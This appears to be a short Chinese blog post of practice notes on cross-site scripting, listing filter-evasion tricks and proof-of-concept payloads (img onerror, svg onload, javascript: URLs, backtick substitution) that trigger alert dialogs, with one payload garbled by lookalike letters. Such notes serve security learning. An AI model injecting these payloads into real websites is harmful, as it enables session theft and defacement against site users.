XSS练习

为什么一天发两个才有券啊啊啊啊
凑个数

<img src=1>空格可以用斜杠 / 替换
用语句<img/src=1>查看一下有没有被过滤掉,没有的话插入弹窗语句
弹窗语句:
<img/src=1 onerror=alert(1)>">把前面注释掉,然后插入自己要插入的代码(有时是 ' )
"<如果被转义,说明这个地方不存在XSS,输入点找的不对,看看其他输入点
on事件—on被更改为o_n,可以改变大小写
on被过滤,使用伪协议:<iframe src="javascript:alert(1) ">
<img被过滤,试一下大小写,不行,更换标签:<svg/onload=prompt(1)><svg/onload=alert(1)>
script被过滤,用 " 闭合前面属性,空格,后面加新的属性:οnmοuseοver=alert(1),再加空格或者//
()被过滤,用反引号替换
<>对被过滤可以试一下语句去掉后面>,也就是不闭合
"被过滤:<a href="输出点">改为<a href="javascript:alert(1)">(即伪协议)
有两个输出点,一个被过滤可以利用另一个

弹窗函数有:
confirm()、prompt()以及alert()

<script>prompt(1)</script>
<script>confirm(XSS)</script>
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值